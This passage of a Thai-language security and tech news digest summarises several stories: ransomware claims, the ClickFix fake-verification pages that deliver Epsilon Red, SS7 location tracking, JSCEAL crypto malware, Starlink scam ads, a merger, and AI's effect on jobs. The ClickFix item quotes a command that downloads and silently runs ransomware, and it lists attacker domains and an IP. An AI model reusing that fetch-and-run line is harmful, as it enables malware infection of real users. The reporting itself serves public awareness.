เคยโจมตี Coca-Cola ในเดือนพฤษภาคม 2025 และเผยแพร่ข้อมูลพนักงาน
ใช้ dark web leak site เป็นเครื่องมือกดดันเหยื่อ

Mailchimp เป็นบริษัทใหญ่ที่มีผู้ใช้กว่า 14 ล้านราย และถูก Intuit ซื้อกิจการในปี 2021
มีรายได้ปีละ $61 พันล้าน และถือครองตลาดอีเมลถึง 2 ใน 3
การโจมตีแม้จะเล็ก แต่กระทบต่อภาพลักษณ์และความเชื่อมั่น

ในเดือนกรกฎาคม 2025 มีการโจมตีหลายกรณีที่น่าจับตา
INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree
GLOBAL GROUP เจาะ Albavisión ได้ 400 GB
Medusa เรียกค่าไถ่ NASCAR $4 ล้าน พร้อมขู่เปิดเผยข้อมูล

https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/

เรื่องเล่าจากข่าว: “SS7 encoding attack” เมื่อการสื่อสารกลายเป็นช่องทางลับของการสอดแนม

SS7 หรือ Signaling System 7 คือโปรโตคอลเก่าแก่ที่ใช้เชื่อมต่อสายโทรศัพท์, ส่งข้อความ, และจัดการการโรมมิ่งระหว่างเครือข่ายมือถือทั่วโลก แม้จะเป็นหัวใจของการสื่อสารยุคใหม่ แต่ SS7 ไม่เคยถูกออกแบบมาให้ปลอดภัยในระดับที่ทันสมัย

ล่าสุดนักวิจัยจาก Enea พบว่า บริษัทสอดแนมแห่งหนึ่งใช้เทคนิคใหม่ในการ “ปรับรูปแบบการเข้ารหัส” ของข้อความ SS7 เพื่อหลบเลี่ยงระบบตรวจจับ เช่น firewall และระบบเฝ้าระวัง ทำให้สามารถขอข้อมูลตำแหน่งของผู้ใช้มือถือจากผู้ให้บริการได้โดยไม่ถูกบล็อก

เทคนิคนี้อาศัยการปรับโครงสร้างของข้อความ TCAP (Transaction Capabilities Application Part) ซึ่งเป็นชั้นใน SS7 ที่ใช้ส่งข้อมูลระหว่างเครือข่าย โดยใช้การเข้ารหัสแบบ ASN.1 BER ที่มีความยืดหยุ่นสูง ทำให้สามารถสร้างข้อความที่ “ถูกต้องตามหลักการ แต่ผิดจากที่ระบบคาดไว้” จนระบบไม่สามารถตรวจจับได้

การโจมตีนี้ถูกใช้จริงตั้งแต่ปลายปี 2024 และสามารถระบุตำแหน่งผู้ใช้ได้ใกล้ถึงระดับเสาสัญญาณ ซึ่งในเมืองใหญ่หมายถึงระยะเพียงไม่กี่ร้อยเมตร

SS7 encoding attack คือการปรับรูปแบบการเข้ารหัสของข้อความ SS7 เพื่อหลบเลี่ยงระบบตรวจจับ
ใช้เทคนิคการเข้ารหัสแบบ ASN.1 BER ในชั้น TCAP ของ SS7
สร้างข้อความที่ดูถูกต้องแต่ระบบไม่สามารถถอดรหัสได้

บริษัทสอดแนมใช้เทคนิคนี้เพื่อขอข้อมูลตำแหน่งผู้ใช้มือถือจากผู้ให้บริการ
ส่งคำสั่ง PSI (ProvideSubscriberInfo) ที่ถูกปรับแต่ง
ระบบไม่สามารถตรวจสอบ IMSI ได้ จึงไม่บล็อกคำขอ

การโจมตีนี้ถูกใช้จริงตั้งแต่ปลายปี 2024 และยังคงมีผลในปี 2025
พบหลักฐานการใช้งานในเครือข่ายจริง
บริษัทสอดแนมสามารถระบุตำแหน่งผู้ใช้ได้ใกล้ระดับเสาสัญญาณ

SS7 ยังคงถูกใช้งานอย่างแพร่หลาย แม้จะมีเทคโนโลยีใหม่อย่าง Diameter และ 5G signaling
การเลิกใช้ SS7 ไม่ใช่ทางเลือกสำหรับผู้ให้บริการส่วนใหญ่
ต้องใช้วิธีป้องกันเชิงพฤติกรรมและการวิเคราะห์ภัยคุกคาม

Enea แนะนำให้ผู้ให้บริการตรวจสอบรูปแบบการเข้ารหัสที่ผิดปกติและเสริม firewall ให้แข็งแรงขึ้น
ใช้การวิเคราะห์พฤติกรรมร่วมกับ threat intelligence
ป้องกันการหลบเลี่ยงระบบตรวจจับในระดับโครงสร้างข้อความ

ผู้ใช้มือถือไม่สามารถป้องกันการโจมตีนี้ได้ด้วยตัวเอง
การโจมตีเกิดในระดับเครือข่ายมือถือ ไม่ใช่ที่อุปกรณ์ของผู้ใช้
ต้องพึ่งผู้ให้บริการในการป้องกัน

ระบบ SS7 firewall แบบเดิมไม่สามารถตรวจจับการเข้ารหัสที่ผิดปกติได้
ข้อความที่ใช้ encoding แบบใหม่จะผ่าน firewall โดยไม่ถูกบล็อก
IMSI ที่ถูกซ่อนไว้จะไม่ถูกตรวจสอบว่าเป็นเครือข่ายภายในหรือภายนอก

บริษัทสอดแนมสามารถใช้ช่องโหว่นี้เพื่อสอดแนมผู้ใช้โดยไม่ต้องได้รับอนุญาตจากรัฐ
แม้จะอ้างว่าใช้เพื่อจับอาชญากร แต่มีการใช้กับนักข่าวและนักเคลื่อนไหว
เป็นการละเมิดสิทธิส่วนบุคคลอย่างร้ายแรง

ระบบ SS7 มีความซับซ้อนและไม่ถูกออกแบบมาให้รองรับการป้องกันภัยสมัยใหม่
ASN.1 BER มีความยืดหยุ่นสูงจนกลายเป็นช่องโหว่
การปรับโครงสร้างข้อความสามารถหลบเลี่ยงระบบตรวจจับได้ง่าย

https://hackread.com/researchers-ss7-encoding-attack-surveillance-vendor/

เรื่องเล่าจากโลกสุขภาพดิจิทัล: เมื่อข้อมูลสุขภาพกลายเป็นสินทรัพย์ของ AI

ในงาน “Making Health Technology Great Again” ที่ทำเนียบขาว Trump ประกาศโครงการใหม่ให้ประชาชนอเมริกันสามารถ “สมัครใจ” แชร์ข้อมูลสุขภาพ เช่น ประวัติการรักษา น้ำหนัก โรคเรื้อรัง ไปยังบริษัทเทคโนโลยีอย่าง Google, Amazon และ Apple โดยมีเป้าหมายเพื่อสร้างระบบสุขภาพดิจิทัลที่สามารถให้คำแนะนำเฉพาะบุคคลผ่านแอปและ AI

ระบบนี้จะดูแลโดย Centers for Medicare and Medicaid Services (CMS) ซึ่งจะรวบรวมข้อมูลจากหลายแหล่งและเชื่อมโยงกับแอปสุขภาพ เช่น Apple Health เพื่อให้ผู้ใช้สามารถดูผลตรวจเลือดหรือประวัติการรักษาได้ทันที

แต่ผู้เชี่ยวชาญด้านกฎหมายและจริยธรรมเตือนว่า “ไม่มีกรอบกฎหมายที่ชัดเจน” ว่า AI จะใช้ข้อมูลเหล่านี้อย่างไร และอาจนำไปสู่การใช้ข้อมูลในทางที่เป็นอันตรายต่อผู้ป่วย เช่น การประเมินความเสี่ยงทางสุขภาพเพื่อการประกัน หรือการขายข้อมูลให้บริษัทโฆษณา

Trump เปิดตัวโครงการให้ประชาชนแชร์ข้อมูลสุขภาพกับ Big Tech
มีเป้าหมายเพื่อสร้างระบบสุขภาพดิจิทัลที่ใช้ AI
ผู้ใช้ต้อง “สมัครใจ” เข้าร่วมระบบ

ระบบจะดูแลโดย CMS และเชื่อมโยงกับแอปสุขภาพต่างๆ3
เช่น Apple Health สามารถเข้าถึงผลตรวจจากโรงพยาบาล
ใช้ AI วิเคราะห์พฤติกรรมสุขภาพและให้คำแนะนำเฉพาะบุคคล

มีบริษัทกว่า 60 แห่งเข้าร่วม เช่น Google, Amazon, Cleveland Clinic4
ตั้งเป้าเริ่มใช้งานจริงในไตรมาสแรกของปี 2026
รวมถึงระบบลงทะเบียนผ่าน QR code และแอปติดตามยา

ประโยชน์ของระบบสุขภาพดิจิทัล6
ลดข้อผิดพลาดทางการแพทย์
เพิ่มความสะดวกในการเข้าถึงข้อมูลสุขภาพ
ลดค่าใช้จ่ายในการรักษาและเดินทาง
ส่งเสริมการดูแลสุขภาพด้วยตนเองผ่านอุปกรณ์ IoT

ความเสี่ยงด้านความเป็นส่วนตัวและการใช้ข้อมูลโดยไม่ได้รับความยินยอม
ไม่มีกรอบกฎหมายชัดเจนสำหรับการใช้ข้อมูลสุขภาพใน AI
ข้อมูลอาจถูกใช้เพื่อการโฆษณา หรือประเมินความเสี่ยงโดยบริษัทประกัน

ความไม่มั่นใจในความปลอดภัยของข้อมูลที่เก็บโดย Big Tech
ระบบอาจถูกเจาะข้อมูลหรือใช้ในทางที่ไม่โปร่งใส
ค่าเสียหายจากการละเมิดข้อมูลสุขภาพเฉลี่ยสูงถึง $10.1 ล้านต่อกรณีในสหรัฐฯ

การแบ่งปันข้อมูลอาจสร้างความเหลื่อมล้ำในการเข้าถึงบริการสุขภาพ
กลุ่มประชากรที่ไม่มีอุปกรณ์หรือความรู้ดิจิทัลอาจถูกทิ้งไว้ข้างหลัง
ระบบอาจเน้นเฉพาะกลุ่มที่อยู่ในเมืองหรือมีรายได้สูง

CMS เคยอนุญาตให้ ICE เข้าถึงข้อมูล Medicaid เพื่อใช้ในการตรวจสอบคนเข้าเมือง
สร้างความกังวลว่าข้อมูลสุขภาพอาจถูกใช้เพื่อวัตถุประสงค์อื่นที่ไม่เกี่ยวกับการรักษา
ขัดต่อหลักการของ HIPAA ที่เน้นการคุ้มครองข้อมูลสุขภาพส่วนบุคคล

https://wccftech.com/president-trump-wants-americans-to-share-personal-health-data-with-big-tech/

เรื่องเล่าจากโลกคริปโต: JSCEAL มัลแวร์ที่ซ่อนตัวในโฆษณาและ JavaScript

นักวิจัยจาก Check Point พบแคมเปญมัลแวร์ขนาดใหญ่ที่เริ่มต้นตั้งแต่มีนาคม 2024 โดยใช้ชื่อว่า “JSCEAL” ซึ่งมีเป้าหมายคือผู้ใช้แอปซื้อขายคริปโตและกระเป๋าเงินดิจิทัล โดยแฮกเกอร์สร้างแอปปลอมและเว็บไซต์หลอกลวงที่ดูเหมือนของจริง แล้วโปรโมตผ่านโฆษณาบน Facebook และแพลตฟอร์มอื่น ๆ

เมื่อเหยื่อคลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่ให้ดาวน์โหลดไฟล์ติดตั้ง MSI ซึ่งเมื่อเปิดใช้งาน จะเริ่มกระบวนการเก็บข้อมูลระบบผ่าน PowerShell และสคริปต์ JavaScript ที่ซ่อนอยู่ในเว็บไซต์ จากนั้นจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของแฮกเกอร์ และหากพบว่าเครื่องมีข้อมูลสำคัญ ก็จะปล่อย payload สุดท้ายคือ JSCEAL ซึ่งทำงานผ่าน Node.js

JSCEAL ใช้ไฟล์ JavaScript ที่ถูกคอมไพล์ด้วย V8 engine ของ Google ซึ่งทำให้โค้ดถูกซ่อนไว้อย่างแนบเนียนและหลบเลี่ยงการตรวจจับจากแอนติไวรัสได้อย่างมีประสิทธิภาพ

JSCEAL เป็นมัลแวร์ที่ใช้ไฟล์ JavaScript แบบคอมไพล์เพื่อหลบเลี่ยงการตรวจจับ
ใช้ฟีเจอร์ V8 JSC ของ Google เพื่อซ่อนโค้ด
ทำให้แอนติไวรัสทั่วไปไม่สามารถวิเคราะห์ได้ก่อนการรันจริง

แคมเปญนี้เริ่มตั้งแต่มีนาคม 2024 และยังคงแพร่กระจายอย่างต่อเนื่อง
พบโฆษณาปลอมกว่า 35,000 รายการใน EU ภายในครึ่งแรกของปี 2025
คาดว่ามีผู้ตกเป็นเหยื่อมากกว่า 10 ล้านคนทั่วโลก

แฮกเกอร์ใช้โฆษณาบน Facebook เพื่อหลอกให้ติดตั้งแอปปลอม
โฆษณาถูกโพสต์ผ่านบัญชีที่ถูกขโมยหรือสร้างใหม่
เว็บไซต์ปลอมเลียนแบบบริการจริง เช่น TradingView

ไฟล์ MSI ที่ดาวน์โหลดจะเปิดเว็บวิวไปยังเว็บไซต์จริงเพื่อหลอกเหยื่อ
ใช้ msedge_proxy.exe เพื่อเปิดเว็บจริงควบคู่กับการติดตั้งมัลแวร์
ทำให้เหยื่อไม่สงสัยว่ามีสิ่งผิดปกติเกิดขึ้น

JSCEAL สามารถขโมยข้อมูลได้หลากหลายประเภท
รหัสผ่าน, คุกกี้, seed phrase, ข้อมูล Telegram, ภาพหน้าจอ, keystroke
สามารถดักจับเว็บทราฟฟิกและฝังสคริปต์ในเว็บไซต์ธนาคารหรือคริปโต

มัลแวร์มีโครงสร้างแบบหลายชั้นและปรับเปลี่ยน payload ได้ตามสถานการณ์
ใช้ fingerprinting scripts เพื่อประเมินความคุ้มค่าของเหยื่อก่อนปล่อย payload
มีการตั้ง proxy ภายในเครื่องเพื่อดักข้อมูลแบบ real-time

https://www.techradar.com/pro/security/major-new-malware-strain-targets-crypto-users-via-malicious-ads-heres-what-we-know-and-how-to-stay-safe

เรื่องเล่าจากสนามแข่งขันโครงสร้างพื้นฐานโลก: เมื่อดีล HPE–Juniper กลายเป็นยุทธศาสตร์ชาติ

เดิมทีการควบรวมกิจการระหว่าง HPE กับ Juniper ถูกมองว่าเป็นการขยายพอร์ตโฟลิโอบริการ edge-to-cloud แต่เบื้องหลังกลับมีแรงผลักดันจากหน่วยข่าวกรองและทำเนียบขาวที่มองว่า Huawei กำลังกลายเป็นภัยคุกคามเชิงยุทธศาสตร์ในโครงสร้างพื้นฐานดิจิทัลทั่วโลก

Huawei เสนอระบบเครือข่ายครบวงจรที่รวมฮาร์ดแวร์ คลาวด์ และ AI ในราคาถูกกว่าคู่แข่งตะวันตก ทำให้หลายประเทศกำลังพึ่งพาเทคโนโลยีจีนมากขึ้น ซึ่งอาจลดอิทธิพลของสหรัฐฯ ในการควบคุมข้อมูลและความมั่นคงไซเบอร์

ด้วยเหตุนี้ HPE–Juniper จึงถูกผลักดันให้กลายเป็น “ทางเลือกของโลกเสรี” โดยผสานจุดแข็งของ Juniper ด้าน routing และ Mist AI เข้ากับ GreenLake และโครงสร้างพื้นฐานของ HPE เพื่อสร้างแพลตฟอร์มเครือข่ายที่ครบวงจรแบบเดียวกับ Huawei

แม้กระทรวงยุติธรรมสหรัฐฯ (DOJ) จะมีข้อกังวลด้านการแข่งขัน แต่สุดท้ายก็ต้องยอมให้ดีลผ่านหลังจากถูกกดดันจากหน่วยข่าวกรองและทำเนียบขาว โดยมีเจ้าหน้าที่ DOJ บางคนถูกปลดจากตำแหน่งระหว่างกระบวนการอนุมัติ

HPE ได้รับอนุมัติให้ควบรวมกิจการกับ Juniper Networks มูลค่า $14B
ประกาศดีลตั้งแต่ ม.ค. 2024 และปิดดีลใน ก.ค. 2025
สร้างหน่วยธุรกิจใหม่ “HPE Networking” โดยรวมแบรนด์ Aruba และ Juniper

ดีลนี้มีแรงผลักดันจากหน่วยข่าวกรองสหรัฐฯ และทำเนียบขาว
มองว่า Huawei เป็นภัยคุกคามเชิงยุทธศาสตร์
ต้องการสร้างทางเลือกให้พันธมิตรที่ไม่พึ่งพาเทคโนโลยีจีน

HPE–Juniper จะสร้างแพลตฟอร์มเครือข่ายครบวงจรแบบ AI-native
ผสาน Mist AI, routing, cloud และ edge infrastructure
เป้าหมายคือตลาดที่มีข้อมูลอ่อนไหว เช่น ภาครัฐและพันธมิตรสหรัฐฯ

DOJ เคยมีข้อกังวลด้านการแข่งขัน แต่สุดท้ายยอมให้ดีลผ่าน
เจ้าหน้าที่ DOJ 2 คนที่คัดค้านถูกปลดออก
แสดงให้เห็นว่าความมั่นคงชาติมีอิทธิพลเหนือกฎการแข่งขัน

HPE ต้องเปิดให้คู่แข่งเข้าถึงบางส่วนของ Mist AI ตามเงื่อนไข DOJ
เฉพาะโมเดล AI ด้านการตรวจจับและวิเคราะห์เครือข่าย
ไม่รวมระบบปฏิบัติการหรือข้อมูลลูกค้า

HPE ต้องขายธุรกิจ Aruba Instant On สำหรับ SMB ตามเงื่อนไข DOJ
เป็นธุรกิจขนาดเล็กที่แยกจาก Aruba Central
ไม่กระทบต่อธุรกิจหลักของ HPE

การควบรวมอาจลดการแข่งขันในตลาดเครือข่ายองค์กร
อาจทำให้ผู้บริโภคมีตัวเลือกน้อยลง
ส่งผลต่อราคาหรือนวัตกรรมในระยะยาว

การแทรกแซงจากรัฐบาลอาจบั่นทอนความเป็นอิสระของหน่วยงานกำกับดูแล
เจ้าหน้าที่ DOJ ที่คัดค้านถูกปลดออกจากตำแหน่ง
สะท้อนแนวโน้มที่ “ยุทธศาสตร์ชาติ” มาก่อน “กฎตลาด”

การพึ่งพา Mist AI อาจสร้างความเสี่ยงด้านการผูกขาดข้อมูลเครือข่าย
แม้เปิดให้คู่แข่งเข้าถึงบางส่วน แต่ข้อมูลหลักยังอยู่กับ HPE
การวิเคราะห์เครือข่ายอาจถูกควบคุมโดยผู้เล่นรายเดียว

การแข่งขันกับ Huawei อาจนำไปสู่สงครามเทคโนโลยีที่ยืดเยื้อ
ประเทศกำลังพัฒนาอาจถูกบีบให้เลือกข้าง
สร้างความตึงเครียดในภูมิภาค เช่น เอเชียตะวันออกเฉียงใต้

https://www.tomshardware.com/tech-industry/hpe-gets-approval-for-usd14b-acquisition-of-juniper-to-defend-ai-networking-edge-against-chinas-huawei-white-house-stepped-in-after-agencies-flagged-national-security-concerns

เรื่องเล่าจากโลกการทำงาน: เมื่อ AI ไม่ได้มาแทนทุกคน แต่บางคนต้องปรับตัวก่อนใคร

รายงานนี้ใช้ข้อมูลจากการใช้งานจริงของผู้คนกับ AI ตลอด 9 เดือนในปี 2024 โดยนำไปจับคู่กับฐานข้อมูล O*NET ของรัฐบาลสหรัฐฯ เพื่อดูว่า AI สามารถช่วยงานอะไรได้บ้าง และช่วยได้ดีแค่ไหน

ผลลัพธ์คือ “รายชื่ออาชีพ” ที่ AI สามารถช่วยงานได้มากที่สุด เช่น งานที่เกี่ยวกับการสื่อสาร การเขียน และการตอบคำถาม เช่น นักแปล นักเขียน พนักงานบริการลูกค้า และผู้ประกาศข่าว ซึ่ง AI สามารถช่วยเขียน ตอบคำถาม และจัดการข้อมูลได้อย่างมีประสิทธิภาพ

ในทางกลับกัน งานที่ยังปลอดภัยคือ งานที่ต้องใช้แรงกาย ทักษะเฉพาะ หรือการดูแลแบบใกล้ชิด เช่น พนักงานดูแลผู้ป่วย ช่างเทคนิค งานก่อสร้าง และงานที่ต้องใช้ความรู้สึกหรือการตัดสินใจเฉพาะหน้า ซึ่ง AI ยังไม่สามารถเลียนแบบได้

Microsoft วิเคราะห์ข้อมูลจริงจาก Bing Copilot เพื่อวัดผลกระทบของ AI ต่ออาชีพต่าง ๆ
ใช้ข้อมูลกว่า 200,000 บทสนทนาในช่วง 9 เดือน
จับคู่กับฐานข้อมูล O*NET เพื่อวิเคราะห์งานแต่ละประเภท

อาชีพที่ AI สามารถช่วยงานได้มากที่สุดคือกลุ่มงานสื่อสารและข้อมูล
นักแปล, นักเขียน, นักข่าว, พนักงานบริการลูกค้า, ผู้ประกาศข่าว
งานที่เกี่ยวกับการตอบคำถาม เขียนเนื้อหา และจัดการข้อมูล

อาชีพที่ยังปลอดภัยจาก AI คือกลุ่มงานที่ใช้แรงกายหรือดูแลใกล้ชิด
ผู้ช่วยพยาบาล, ช่างเทคนิค, คนงานก่อสร้าง, พนักงานล้างจาน
งานที่ต้องใช้ทักษะเฉพาะและการตัดสินใจเฉพาะหน้า

AI ยังไม่สามารถแทนที่คนได้ทั้งหมด แต่สามารถช่วยงานบางส่วนได้ดีมาก
งานที่มี “AI applicability score” สูง หมายถึง AI ช่วยได้หลายส่วน
แต่ไม่ได้หมายความว่าอาชีพนั้นจะหายไปทันที

เทคโนโลยีอาจเปลี่ยนแปลงงานในรูปแบบที่ไม่คาดคิด
เหมือนกรณี ATM ที่ทำให้จำนวนพนักงานธนาคารเพิ่มขึ้น
AI อาจสร้างงานใหม่ในอนาคตที่ยังไม่มีในปัจจุบัน

อาชีพที่มีความเสี่ยงสูงอาจถูกลดบทบาทหรือแทนที่บางส่วนในระยะสั้น
เช่น นักเขียน, นักแปล, พนักงานบริการลูกค้า, นักข่าว
บริษัทอาจใช้ AI เพื่อลดต้นทุนและจำนวนพนักงาน

อาชีพที่ดูปลอดภัยในวันนี้ อาจถูกเปลี่ยนแปลงในอนาคตเมื่อ AI พัฒนา
เช่น งานก่อสร้างหรืองานดูแลผู้ป่วย อาจถูกแทนที่บางส่วนด้วยหุ่นยนต์
ความก้าวหน้าของ AI และหุ่นยนต์อาจทำให้ขอบเขตเปลี่ยนไป

การพึ่งพา AI มากเกินไปอาจลดคุณภาพของงานที่ต้องใช้ความคิดสร้างสรรค์หรือความเข้าใจมนุษย์
งานเขียนหรือการสื่อสารที่ซับซ้อนอาจขาดความลึกซึ้ง
ผู้ใช้ต้องมีวิจารณญาณในการใช้ AI เป็นเครื่องมือ ไม่ใช่ตัวแทน

การเปลี่ยนแปลงนี้อาจสร้างความเหลื่อมล้ำระหว่างคนที่มีทักษะ AI กับคนทั่วไป
คนที่ไม่ปรับตัวอาจถูกลดบทบาทในตลาดแรงงาน
การเรียนรู้ทักษะใหม่จึงเป็นสิ่งจำเป็นในยุคนี้

https://www.techspot.com/news/108869-jobs-most-likely-automated-ai.html

เรื่องเล่าจากอวกาศปลอม: เมื่อ Starlink ถูกแอบอ้างเพื่อหลอกเงินผู้บริโภค

ช่วงกลางปี 2025 มีโฆษณาบน Facebook ที่อ้างว่าเสนอ “แพ็กเกจอินเทอร์เน็ต Starlink ตลอดชีพ” ในราคาเพียง $127 หรือแม้แต่ “แผนรายปี $67” พร้อมจานรับสัญญาณ Starlink Mini ฟรี ฟังดูคุ้มเกินจริงใช่ไหม? เพราะมันคือ “หลอกลวงเต็มรูปแบบ”2

เมื่อผู้ใช้คลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่เลียนแบบหน้าตาและโลโก้ของ Starlink อย่างแนบเนียน เช่น “ministarnt.xyz” หรือ “starlinkoficial.com” ซึ่งใช้ภาพจริงและคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ

เว็บไซต์เหล่านี้หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตและที่อยู่จัดส่ง โดยไม่มีการส่งสินค้าใด ๆ หรือส่งอุปกรณ์ปลอมที่ไม่สามารถเชื่อมต่อกับดาวเทียมได้เลย บางรายยังถูกขโมยข้อมูลและพบธุรกรรมแปลก ๆ ในบัญชีธนาคารภายหลัง

SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ และย้ำว่าโปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการเท่านั้น เช่น การแจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน

มีการหลอกลวงผ่าน Facebook โดยอ้างว่าเป็นแพ็กเกจ Starlink ตลอดชีพ
ราคาเพียง $127 หรือ $67 ต่อปี พร้อมจาน Starlink Mini ฟรี
ดูเหมือนถูกมากเมื่อเทียบกับค่าบริการจริงที่ $120 ต่อเดือน

เว็บไซต์ปลอมเลียนแบบหน้าตา Starlink อย่างแนบเนียน
ใช้ชื่อโดเมนคล้ายของจริง เช่น “starlinkoficial.com”
มีโลโก้ ภาพสินค้า และคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ

เมื่อผู้ใช้กรอกข้อมูล จะถูกขโมยเงินหรือข้อมูลส่วนตัว
บางรายไม่ได้รับสินค้าเลย หรือได้อุปกรณ์ปลอมที่ใช้ไม่ได้
พบธุรกรรมแปลก ๆ ในบัญชีหลังจากซื้อสินค้า

SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้
โปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการ
ตัวอย่างโปรจริง: แจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน (มูลค่า $499)

ผู้ใช้ทั่วโลกเริ่มร้องเรียนบนโซเชียลมีเดียตั้งแต่เดือนพฤษภาคม
PCMag พบหลายรูปแบบของโฆษณาหลอกลวงเมื่อค้นคำว่า “Starlink” บน Facebook

วิธีตรวจสอบว่าโปรโมชั่นจริงหรือไม่
เข้าเว็บไซต์ทางการของบริษัทเพื่อตรวจสอบ
ตรวจสอบบัญชีโซเชียลมีเดียที่ได้รับการยืนยัน
โทรสอบถามฝ่ายบริการลูกค้าโดยตรง

https://www.techspot.com/news/108874-viral-lifetime-starlink-offer-facebook-total-scam.html

เรื่องเล่าจากโลกเข้ารหัส: เมื่อ Apple ถูกบังคับให้เปิดประตูหลัง แต่ Google ยังปลอดภัย

ต้นปี 2025 รัฐบาลสหราชอาณาจักรได้ออกคำสั่งลับที่เรียกว่า “Technical Capability Notice” (TCN) ภายใต้กฎหมาย Investigatory Powers Act ปี 2016 เพื่อให้ Apple สร้างช่องทางให้เจ้าหน้าที่เข้าถึงข้อมูลที่ถูกเข้ารหัสใน iCloud โดยเฉพาะฟีเจอร์ Advanced Data Protection (ADP) ที่แม้แต่ Apple เองก็ไม่สามารถเข้าถึงได้

Apple ตัดสินใจยกเลิก ADP สำหรับผู้ใช้ใหม่ในสหราชอาณาจักร และให้ผู้ใช้เดิมปิดฟีเจอร์นี้เองภายในช่วงเวลาผ่อนผัน พร้อมยื่นอุทธรณ์คำสั่งต่อศาลพิเศษด้านการสอดแนม (Investigatory Powers Tribunal)

ในขณะเดียวกัน Google ซึ่งให้บริการเข้ารหัสแบบ end-to-end ในหลายผลิตภัณฑ์ เช่น Android backups กลับออกมายืนยันว่า “ไม่เคยได้รับคำสั่ง TCN” และ “ไม่เคยสร้างช่องโหว่หรือ backdoor ใด ๆ” แม้ก่อนหน้านี้จะปฏิเสธตอบคำถามจากวุฒิสมาชิกสหรัฐฯ Ron Wyden

